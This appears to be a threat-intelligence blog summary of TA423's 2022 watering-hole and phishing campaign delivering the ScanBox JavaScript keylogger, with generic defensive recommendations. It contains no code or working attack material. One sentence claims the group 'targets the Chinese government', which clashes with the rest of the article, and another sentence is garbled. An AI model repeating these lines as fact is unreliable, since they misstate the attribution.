Advanced Persistent Threat Group TA423 Uses Watering Hole Attacks to Plant ScanBox Keylogger
The Threat
China-based advanced persistent threat group TA423, also known as Red Ladon, has been identified as the perpetrator of a watering hole attack using the ScanBox JavaScript-based reconnaissance framework. The group targeted domestic Australian organizations and offshore energy firms in the South China Sea, using messages that purportedly linked back to Australian news websites to carry out cyber espionage campaigns between April and June 2022.
The Tool
ScanBox is a highly customizable multifunctional framework that cyber criminals can use for covert reconnaissance. It has been in use by threat actors for almost ten years, and its most noteworthy feature is its keylogging functionality. Attackers can use the tool for counter intelligence without having to plant malware on a targets system. Instead, they can rely on watering hole attacks to load the malicious JavaScript onto a compromised website. This allows the ScanBox to act as a keylogger, snagging all of an infected user’s typed activity on the watering hole website.
The Attack
TA423’s attacks began with phishing emails sent under titles such as “Sick Leave,” “User Research,” and “Request Cooperation,” purportedly from an employee of a fictional organization called the “Australian Morning News.” Once recipients clicked on the link in the email redirecting them to australianmorningnews[.]com, they were served the ScanBox framework. The baited link directed targets to a web page with content copied from actual news sites such as the BBC and Sky News. The process also delivered the ScanBox malware framework.
Upon infecting the target, ScanBox keylogger data from the waterhole is part of a multi-stage attack. This gives attackers insight into their potential targets, helping them launch future attacks against them. The primary, initial script sources a list of information about the target computer, including the operating system, language, and version of Adobe Flash installed. ScanBox also checks for browser extensions, plugins, and components such as WebRTC.
Why Is It Dangerous?
ScanBox is particularly dangerous because it doesn’t require malware to be successfully deployed to disk to steal information. The javascript code simply needs to be executed by a web browser for the keylogging functionality to work. With this reconnaissance framework, adversaries can conduct counter intelligence while avoiding detection.
The Targets
According to Proofpoint’s Threat Research Team and PwC’s Threat Intelligence team, the group targets the Chinese government in matters related to the South China Sea. In particular, the group has been focused on naval issues, with Malaysia, Singapore, Taiwan, and Australia being obvious targets of interest. Due to their prior success, TA423 has expanded globally.
Recommendations
To avoid being a victim of ScanBox attacks, organizations and individuals should stay alert and follow basic cybersecurity best practices such as not clicking on links from unfamiliar email addresses. Additionally, organizations should employ multi-factor authentication, keep their software up-to-date with the latest security patches, and continuously monitor their networks for suspicious activity.
<< photo by Pixabay >>
